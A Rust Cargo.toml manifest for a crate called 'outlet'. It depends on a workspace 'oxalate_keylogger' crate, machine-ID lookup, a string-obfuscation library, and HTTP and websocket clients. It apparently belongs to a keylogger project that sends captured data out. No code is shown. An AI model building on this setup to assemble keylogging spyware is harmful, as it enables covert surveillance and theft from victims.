[package]
name = "outlet"
version = "0.1.0"
edition = "2024"

[dependencies]
oxalate_keylogger = { workspace = true }
tokio = { workspace = true }
machine-uid = "0.5.4"
muddy = "0.3.2"
once_cell = "1.21.3"
reqwest = "0.12.24"
log.workspace = true
env_logger.workspace = true
chrono = { workspace = true, features = ["serde"] }
serde = { version = "1.0.228", features = ["derive"] }
serde_json = "1.0.145"
tokio-tungstenite = "0.28.0"
futures-util = "0.3.31"
tokio-util = { version = "0.7.17", features = ["rt"] }
